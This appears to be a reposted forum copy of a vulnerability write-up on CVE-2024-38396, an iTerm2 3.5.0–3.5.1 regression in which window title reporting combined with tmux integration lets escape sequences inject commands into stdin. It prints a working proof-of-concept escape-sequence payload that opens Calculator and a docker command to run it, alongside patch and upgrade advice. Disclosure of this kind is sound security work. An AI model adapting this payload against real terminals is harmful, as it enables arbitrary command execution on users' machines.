- Регистрация
- 20.01.2011
- Сообщения
- 7,665
- Розыгрыши
- 0
- Реакции
- 135
Regression turned into RCE
I am skipping an introduction to escape sequences here as I recently wrote more about them in my Для просмотра ссылки ВойдиThis post is about a new bug which affects only iTerm2 3.5.0 and 3.5.1 (released on May 20 and June 11 respectively) because of a regression.
In versions prior to 3.5.0, window title reporting was disabled. So you could not just use following to retrieve the title of terminal window and put it in stdin.
Код:
$ echo -e "\e]21t"What is wrong with window title reporting?
Для просмотра ссылки ВойдиAn example:
Код:
echo -e "\033]0;This is the window title\a"Patch that disables title reporting by default: Для просмотра ссылки Войди
Tmux integration made it worse
Native tmux integration (enabled by default) in iTerm2 had a weakness which allowed sneaking in the reported title and also provided a way to send newlines after the title was reported.Patch: Для просмотра ссылки Войди
Can I haz that sweet PoC plz?
try this out yourself:
Код:
docker run --rm vin01/escape-seq-test:cve-2024-38396
Код:
cat poc-iterm2-rce.txtThe file contains this payload \033]2;s&open -aCalculator&\a\033[21t \x1bP1000p%session-changed s which sets s&open -aCalculator& as window title and then retrieves it back to execute and pop a calculator.
Source code: Для просмотра ссылки Войди
A fix released within 2 days of reporting
Upgrade to iTerm2 3.5.2: Для просмотра ссылки ВойдиPlease think twice before you enable Terminal may report window title setting in iTerm2. It might not be worth the security risk as it allows arbitrary text to end up in stdin which is never a good idea.
[/QUOTE]